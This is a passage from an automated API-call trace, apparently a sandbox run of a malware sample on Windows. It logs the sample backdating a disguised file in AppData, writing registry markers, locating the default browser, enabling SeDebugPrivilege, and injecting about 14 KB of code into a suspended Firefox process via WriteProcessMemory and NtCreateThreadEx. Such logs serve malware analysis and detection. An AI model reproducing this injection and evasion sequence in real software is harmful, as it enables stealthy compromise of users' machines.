dwShareMode=0x3, lpSecurityAttributes=0x172e3a0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0070.204] GetFileType (hFile=0x160) returned 0x1 [0070.204] CloseHandle (hObject=0x160) returned 1 [0070.204] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0070.205] SetFileTime (hFile=0x160, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0070.205] CloseHandle (hObject=0x160) returned 1 [0070.205] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e510 | out: phkResult=0x72f1ed90*=0x160, lpdwDisposition=0x172e510*=0x2) returned 0x0 [0070.205] RegSetValueExA (in: hKey=0x160, lpValueName="FPcnt", Reserved=0x0, dwType=0x4, lpData=0x172e540*=0x0, cbData=0x4 | out: lpData=0x172e540*=0x0) returned 0x0 [0070.205] RegCloseKey (hKey=0x160) returned 0x0 [0070.205] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172e50c | out: phkResult=0x72f1ed90*=0x160, lpdwDisposition=0x172e50c*=0x2) returned 0x0 [0070.205] RegQueryValueExA (in: hKey=0x160, lpValueName="FPcnt", lpReserved=0x0, lpType=0x0, lpData=0x172e53c, lpcbData=0x172e540*=0x4 | out: lpType=0x0, lpData=0x172e53c*=0x0, lpcbData=0x172e540*=0x4) returned 0x0 [0070.205] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172c2d4, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0070.205] GetFileType (hFile=0x15c) returned 0x1 [0070.205] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172c400 | out: lpSystemTimeAsFileTime=0x172c400*(dwLowDateTime=0xf73e6950, dwHighDateTime=0x1d3dfba)) [0070.205] GetLastError () returned 0xb7 [0070.205] SetLastError (dwErrCode=0xb7) [0070.205] GetLastError () returned 0xb7 [0070.205] SetLastError (dwErrCode=0xb7) [0070.205] GetLastError () returned 0xb7 [0070.205] SetLastError (dwErrCode=0xb7) [0070.205] CloseHandle (hObject=0x15c) returned 1 [0070.206] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0070.206] SetFileTime (hFile=0x15c, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0070.206] CloseHandle (hObject=0x15c) returned 1 [0070.206] CloseHandle (hObject=0x140) returned 1 [0070.206] CloseHandle (hObject=0x14c) returned 1 [0070.206] WaitForSingleObject (hHandle=0x11c, dwMilliseconds=0xea60) returned 0x0 [0070.206] CreateFileW (lpFileName="\\\\.\\pipe\\c41b2304" (normalized: "\\device\\namedpipe\\c41b2304"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0070.206] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x140 [0070.206] SetNamedPipeHandleState (hNamedPipe=0x14c, lpMode=0x172e544, lpMaxCollectionCount=0x0, lpCollectDataTimeout=0x0) returned 1 [0070.206] WriteFile (in: hFile=0x14c, lpBuffer=0x312ec8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x172e540, lpOverlapped=0x311230 | out: lpBuffer=0x312ec8*, lpNumberOfBytesWritten=0x172e540*=0x8, lpOverlapped=0x311230) returned 1 [0070.206] CloseHandle (hObject=0x14c) returned 1 [0070.206] CloseHandle (hObject=0x140) returned 1 [0070.206] TerminateProcess (hProcess=0x0, uExitCode=0x0) returned 0 [0070.206] GetLastError () returned 0x6 [0070.206] CloseHandle (hObject=0x0) returned 0 [0070.206] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172fd04 | out: lpSystemTimeAsFileTime=0x172fd04*(dwLowDateTime=0xf73e6950, dwHighDateTime=0x1d3dfba)) [0070.206] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x172fce8 | out: phkResult=0x72f1ed90*=0x140, lpdwDisposition=0x172fce8*=0x2) returned 0x0 [0070.206] RegSetValueExA (in: hKey=0x140, lpValueName="LastValue", Reserved=0x0, dwType=0x4, lpData=0x72f1eda8*=0x5ae5c51a, cbData=0x4 | out: lpData=0x72f1eda8*=0x5ae5c51a) returned 0x0 [0070.207] RegCloseKey (hKey=0x140) returned 0x0 [0070.207] CloseHandle (hObject=0x11c) returned 1 [0070.207] GetTickCount () returned 0x205aa [0070.207] GetLastError () returned 0x6 [0070.207] SetLastError (dwErrCode=0x6) [0070.207] GetLastError () returned 0x6 [0070.207] SetLastError (dwErrCode=0x6) [0070.207] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x172da9c, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.207] GetFileType (hFile=0x11c) returned 0x1 [0070.207] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x172dbc8 | out: lpSystemTimeAsFileTime=0x172dbc8*(dwLowDateTime=0xf73e6950, dwHighDateTime=0x1d3dfba)) [0070.207] GetLastError () returned 0xb7 [0070.207] SetLastError (dwErrCode=0xb7) [0070.207] GetLastError () returned 0xb7 [0070.207] SetLastError (dwErrCode=0xb7) [0070.207] GetLastError () returned 0xb7 [0070.207] SetLastError (dwErrCode=0xb7) [0070.207] CloseHandle (hObject=0x11c) returned 1 [0070.207] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.207] SetFileTime (hFile=0x11c, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0070.207] CloseHandle (hObject=0x11c) returned 1 [0070.207] Sleep (dwMilliseconds=0x41b068) [0080.214] GetLastError () returned 0x0 [0080.214] GetLastError () returned 0x0 [0080.214] GetLastError () returned 0x0 [0080.214] GetLastError () returned 0x0 [0080.214] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76700000 [0080.215] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0080.215] GetProcAddress (hModule=0x76700000, lpProcName="RegQueryValueExA") returned 0x767148ef [0080.215] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0080.215] wsprintfA (in: param_1=0x172bd9c, param_2="%s\\shell\\open\\command" | out: param_1="http\\shell\\open\\command") returned 23 [0080.215] RegCreateKeyExA (in: hKey=0x80000000, lpSubKey="http\\shell\\open\\command", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x172bc70, lpdwDisposition=0x172bc90 | out: phkResult=0x172bc70*=0x142, lpdwDisposition=0x172bc90*=0x2) returned 0x0 [0080.215] RegQueryValueExA (in: hKey=0x142, lpValueName=0x0, lpReserved=0x0, lpType=0x172bc94, lpData=0x172bc98, lpcbData=0x172bc68*=0x104 | out: lpType=0x172bc94*=0x1, lpData="\"C:\\Program Files\\Mozilla Firefox\\firefox.exe\" -osint -url \"%1\"", lpcbData=0x172bc68*=0x40) returned 0x0 [0080.215] RegCloseKey (hKey=0x142) returned 0x0 [0080.215] lstrlenA (lpString=".exe") returned 4 [0080.215] _snwprintf (in: _Dest=0x172c2f8, _Count=0x104, _Format="%S" | out: _Dest="c:\\program files\\mozilla firefox\\firefox.exe") returned 44 [0080.215] GetComputerNameW (in: lpBuffer=0x172bc88, nSize=0x172bc78 | out: lpBuffer="CRH2YWU7", nSize=0x172bc78) returned 1 [0080.215] _snwprintf (in: _Dest=0x172c0f0, _Count=0x104, _Format="%08x" | out: _Dest="c41b2305") returned 8 [0080.215] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="c41b2305") returned 0x140 [0080.215] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0080.215] LoadLibraryW (lpLibFileName="psapi.dll") returned 0x77c70000 [0080.215] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x76700000 [0080.216] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0080.216] GetProcAddress (hModule=0x761d0000, lpProcName="CreateRemoteThread") returned 0x7625f33b [0080.216] GetProcAddress (hModule=0x761d0000, lpProcName="WriteProcessMemory") returned 0x7620c1de [0080.216] GetProcAddress (hModule=0x761d0000, lpProcName="OpenProcess") returned 0x762159d7 [0080.216] GetProcAddress (hModule=0x761d0000, lpProcName="ReadProcessMemory") returned 0x7620c1ce [0080.216] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessW") returned 0x761d204d [0080.216] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0080.216] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0080.216] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0080.216] GetProcAddress (hModule=0x761d0000, lpProcName="VirtualAllocEx") returned 0x7620c1b6 [0080.216] GetProcAddress (hModule=0x761d0000, lpProcName="VirtualFreeEx") returned 0x7620c1ee [0080.216] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0080.216] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0080.217] GetProcAddress (hModule=0x77c70000, lpProcName="EnumProcessModules") returned 0x77c71408 [0080.217] GetProcAddress (hModule=0x77c70000, lpProcName="EnumProcessModulesEx") returned 0x77c715de [0080.217] GetProcAddress (hModule=0x77c70000, lpProcName="GetModuleBaseNameW") returned 0x77c7152c [0080.217] GetProcAddress (hModule=0x77c70000, lpProcName="EnumProcesses") returned 0x77c71544 [0080.217] GetProcAddress (hModule=0x76700000, lpProcName="LookupPrivilegeValueW") returned 0x767141b3 [0080.217] GetProcAddress (hModule=0x76700000, lpProcName="OpenProcessToken") returned 0x76714304 [0080.217] GetProcAddress (hModule=0x76700000, lpProcName="AdjustTokenPrivileges") returned 0x7671418e [0080.217] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x172be68 | out: lpLuid=0x172be68*(LowPart=0x14, HighPart=0)) returned 1 [0080.218] GetCurrentProcess () returned 0xffffffff [0080.218] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x172be74 | out: TokenHandle=0x172be74*=0x11c) returned 1 [0080.218] AdjustTokenPrivileges (in: TokenHandle=0x11c, DisableAllPrivileges=0, NewState=0x172be64*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0080.218] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0080.218] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessW") returned 0x761d204d [0080.238] CreateProcessW (in: lpApplicationName="c:\\program files\\mozilla firefox\\firefox.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x172bfa0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x172bf44 | out: lpCommandLine=0x0, lpProcessInformation=0x172bf44*(hProcess=0x15c, hThread=0x14c, dwProcessId=0xfdc, dwThreadId=0xfe0)) returned 1 [0080.240] GetLastError () returned 0x0 [0080.240] OpenProcess (dwDesiredAccess=0x43a, bInheritHandle=0, dwProcessId=0xfdc) returned 0x150 [0080.240] VirtualAllocEx (hProcess=0x150, lpAddress=0x0, dwSize=0x380c, flAllocationType=0x1000, flProtect=0x4) returned 0x150000 [0080.240] VirtualProtectEx (in: hProcess=0x150, lpAddress=0x150000, dwSize=0x380c, flNewProtect=0x40, lpflOldProtect=0x172be70 | out: lpflOldProtect=0x172be70*=0x4) returned 1 [0080.241] WriteProcessMemory (in: hProcess=0x150, lpBaseAddress=0x150000, lpBuffer=0x172c500*, nSize=0x380c, lpNumberOfBytesWritten=0x172be6c | out: lpBuffer=0x172c500*, lpNumberOfBytesWritten=0x172be6c*=0x380c) returned 1 [0080.241] GetVersionExW (in: lpVersionInformation=0x172bd18*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x172bd18*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0080.241] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77ec0000 [0080.241] GetProcAddress (hModule=0x77ec0000, lpProcName="NtCreateThreadEx") returned 0x77f05728 [0080.241] NtCreateThreadEx (in: ThreadHandle=0x172bcdc, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0x150, lpStartAddress=0x150202, lpParameter=0x153800, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x0, SizeOfStackReserve=0x0, lpBytesBuffer=0x172bca4 | out: ThreadHandle=0x172bcdc*=0x154, lpBytesBuffer=0x172bca4) returned 0x0 [0080.242] CloseHandle (hObject=0x15c) returned 1 [0080.242] CloseHandle (hObject=0x14c) returned 1 [0080.242] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x1729c28, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0080.242] GetFileType (hFile=0x14c) returned 0x1 [0080.242] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1729d54 | out: lpSystemTimeAsFileTime=0x1729d54*(dwLowDateTime=0xfd38fd70, dwHighDateTime=0x1d3dfba)) [0080.242] GetLastError () returned 0xb7 [0080.242] SetLastError (dwErrCode=0xb7) [0080.242] GetLastError () returned 0xb7 [0080.242] SetLastError (dwErrCode=0xb7) [0080.242] GetLastError () returned 0xb7 [0080.242] SetLastError (dwErrCode=0xb7) [0080.243] CloseHandle (hObject=0x14c) returned 1 [0080.243] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0080.243] SetFileTime (hFile=0x14c, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0080.243] CloseHandle (hObject=0x14c) returned 1 [0080.243] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x1729c10, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0080.243] GetFileType (hFile=0x14c) returned 0x1 [0080.244] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1729d3c | out: lpSystemTimeAsFileTime=0x1729d3c*(dwLowDateTime=0xfd38fd70, dwHighDateTime=0x1d3dfba)) [0080.244] GetLastError () returned 0xb7 [0080.244] SetLastError (dwErrCode=0xb7) [0080.244] GetLastError () returned 0xb7 [0080.244] SetLastError (dwErrCode=0xb7) [0080.244] GetLastError () returned 0xb7 [0080.244] SetLastError (dwErrCode=0xb7) [0080.244] GetLastError () returned 0xb7 [0080.244] SetLastError (dwErrCode=0xb7) [0080.244] GetLastError () returned 0xb7 [0080.244] SetLastError (dwErrCode=0xb7) [0080.244] GetLastError () returned 0xb7 [0080.244] SetLastError (dwErrCode=0xb7) [0080.244] GetLastError () returned 0xb7 [0080.244] SetLastError (dwErrCode=0xb7) [0080.244] GetLastError () returned 0xb7 [0080.244] SetLastError (dwErrCode=0xb7) [0080.244] GetLastError () returned 0xb7 [0080.244] SetLastError (dwErrCode=0xb7) [0080.244] GetLastError () returned 0xb7 [0080.244] SetLastError (dwErrCode=0xb7) [0080.244] GetLastError () returned 0xb7 [0080.244] SetLastError (dwErrCode=0xb7) [0080.244] GetLastError () returned 0xb7 [0080.244] SetLastError (dwErrCode=0xb7) [0080.244] GetLastError () returned 0xb7 [0080.244] SetLastError (dwErrCode=0xb7) [0080.244] GetLastError () returned 0xb7 [0080.244] SetLastError (dwErrCode=0xb7) [0080.244] GetLastError () returned 0xb7 [0080.244] SetLastError (dwErrCode=0xb7) [0080.244] GetLastError () returned 0xb7 [0080.244] SetLastError (dwErrCode=0xb7) [0080.244] GetLastError () returned 0xb7 [0080.244] SetLastError (dwErrCode=0xb7) [0080.244] GetLastError () returned 0xb7 [0080.244] SetLastError (dwErrCode=0xb7) [0080.244] GetLastError () returned 0xb7 [0080.244] SetLastError (dwErrCode=0xb7) [0080.244] GetLastError () returned 0xb7 [0080.244] SetLastError (dwErrCode=0xb7) [0080.244] GetLastError () returned 0xb7 [0080.244] SetLastError (dwErrCode=0xb7) [0080.244] GetLastError () returned 0xb7 [0080.245] SetLastError (dwErrCode=0xb7) [0080.245] GetLastError () returned 0xb7 [0080.245] SetLastError (dwErrCode=0xb7) [0080.245] GetLastError () returned 0xb7 [0080.245] SetLastError (dwErrCode=0xb7) [0080.245] GetLastError () returned 0xb7 [0080.245] SetLastError (dwErrCode=0xb7) [0080.245] GetLastError () returned 0xb7 [0080.245] SetLastError (dwErrCode=0xb7) [0080.245] GetLastError () returned 0xb7 [0080.245] SetLastError (dwErrCode=0xb7) [0080.245] GetLastError () returned 0xb7 [0080.245] SetLastError (dwErrCode=0xb7) [0080.245] GetLastError () returned 0xb7 [0080.245] SetLastError (dwErrCode=0xb7) [0080.245] GetLastError () returned 0xb7 [0080.245] SetLastError (dwErrCode=0xb7) [0080.245] GetLastError () returned 0xb7 [0080.245] SetLastError (dwErrCode=0xb7) [0080.245] GetLastError () returned 0xb7 [0080.245] SetLastError (dwErrCode=0xb7) [0080.245] GetLastError () returned 0xb7 [0080.245] SetLastError (dwErrCode=0xb7) [0080.245] GetLastError () returned 0xb7 [0080.245] SetLastError (dwErrCode=0xb7) [0080.245] GetLastError () returned 0xb7 [0080.245] SetLastError (dwErrCode=0xb7) [0080.245] GetLastError () returned 0xb7 [0080.245] SetLastError (dwErrCode=0xb7) [0080.245] GetLastError () returned 0xb7 [0080.245] SetLastError (dwErrCode=0xb7) [0080.245] GetLastError () returned 0xb7 [0080.245] SetLastError (dwErrCode=0xb7) [0080.245] GetLastError () returned 0xb7 [0080.245] SetLastError (dwErrCode=0xb7) [0080.245] GetLastError () returned 0xb7 [0080.245] SetLastError (dwErrCode=0xb7) [0080.245] GetLastError () returned 0xb7 [0080.245] SetLastError (dwErrCode=0xb7) [0080.245] GetLastError () returned 0xb7 [0080.245] SetLastError (dwErrCode=0xb7) [0080.245] GetLastError () returned 0xb7 [0080.246] SetLastError (dwErrCode=0xb7) [0080.246] GetLastError () returned 0xb7 [0080.246] SetLastError (dwErrCode=0xb7) [0080.246] GetLastError () returned 0xb7 [0080.246] SetLastError (dwErrCode=0xb7) [0080.246] GetLastError () returned 0xb7 [0080.246] SetLastError (dwErrCode=0xb7) [0080.246] GetLastError () returned 0xb7 [0080.246] SetLastError (dwErrCode=0xb7) [0080.246] GetLastError () returned 0xb7 [0080.246] SetLastError (dwErrCode=0xb7) [0080.246] GetLastError () returned 0xb7 [0080.246] SetLastError (dwErrCode=0xb7) [0080.246] GetLastError () returned 0xb7 [0080.246] SetLastError (dwErrCode=0xb7) [0080.246] GetLastError () returned 0xb7 [0080.246] SetLastError (dwErrCode=0xb7) [0080.246] GetLastError () returned 0xb7 [0080.246] SetLastError (dwErrCode=0xb7) [0080.246] GetLastError () returned 0xb7 [0080.246] SetLastError (dwErrCode=0xb7) [0080.246] GetLastError () returned 0xb7 [0080.246] SetLastError (dwErrCode=0xb7) [0080.246] GetLastError () returned 0xb7 [0080.246] SetLastError (dwErrCode=0xb7) [0080.246] GetLastError () returned 0xb7 [0080.246] SetLastError (dwErrCode=0xb7) [0080.246] GetLastError () returned 0xb7 [0080.246] SetLastError (dwErrCode=0xb7) [0080.246] GetLastError () returned 0xb7 [0080.246] SetLastError (dwErrCode=0xb7) [0080.246] GetLastError () returned 0xb7 [0080.246] SetLastError (dwErrCode=0xb7) [0080.246] GetLastError () returned 0xb7 [0080.246] SetLastError (dwErrCode=0xb7) [0080.246] GetLastError () returned 0xb7 [0080.246] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.247] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.247] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.247] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.247] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.247] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.247] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.247] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.247] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.247] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.247] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.247] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.247] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.247] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.247] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.247] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.247] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.247] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.247] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.247] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.247] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.247] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.247] SetLastError (dwErrCode=0xb7) [0080.247] GetLastError () returned 0xb7 [0080.248] SetLastError (dwErrCode=0xb7) [0080.248] CloseHandle (hObject=0x14c) returned 1 [0080.248] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0080.248] SetFileTime (hFile=0x14c, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0080.248] CloseHandle (hObject=0x14c) returned 1 [0080.248] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x1729c08, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0080.248] GetFileType (hFile=0x14c) returned 0x1 [0080.248] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1729d34 | out: lpSystemTimeAsFileTime=0x1729d34*(dwLowDateTime=0xfd3b5ed0, dwHighDateTime=0x1d3dfba)) [0080.248] GetLastError () returned 0xb7 [0080.248] SetLastError (dwErrCode=0xb7) [0080.248] GetLastError () returned 0xb7 [0080.248] SetLastError (dwErrCode=0xb7) [0080.248] GetLastError () returned 0xb7 [0080.248] SetLastError (dwErrCode=0xb7) [0080.248] CloseHandle (hObject=0x14c) returned 1 [0080.248] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0080.249] SetFileTime (hFile=0x14c, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0080.249] CloseHandle (hObject=0x14c) returned 1 [0080.249] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0xea60) returned 0x0 [0080.468] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x1729c30, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0080.468] GetFileType (hFile=0x14c) returned 0x1 [0080.468] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1729d5c | out: lpSystemTimeAsFileTime=0x1729d5c*(dwLowDateTime=0xfd5cb210, dwHighDateTime=0x1d3dfba)) [0080.468] GetLastError () returned 0xb7 [0080.468] SetLastError (dwErrCode=0xb7) [0080.468] GetLastError () returned 0xb7 [0080.468] SetLastError (dwErrCode=0xb7) [0080.469] GetLastError () returned 0xb7 [0080.469] SetLastError (dwErrCode=0xb7) [0080.469] CloseHandle (hObject=0x14c) returned 1 [0080.469] CreateFileA (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32\\msvcrtd.tlb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0080.469] SetFileTime (hFile=0x14c, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c) returned 1 [0080.469] CloseHandle (hObject=0x14c) returned 1 [0080.469] 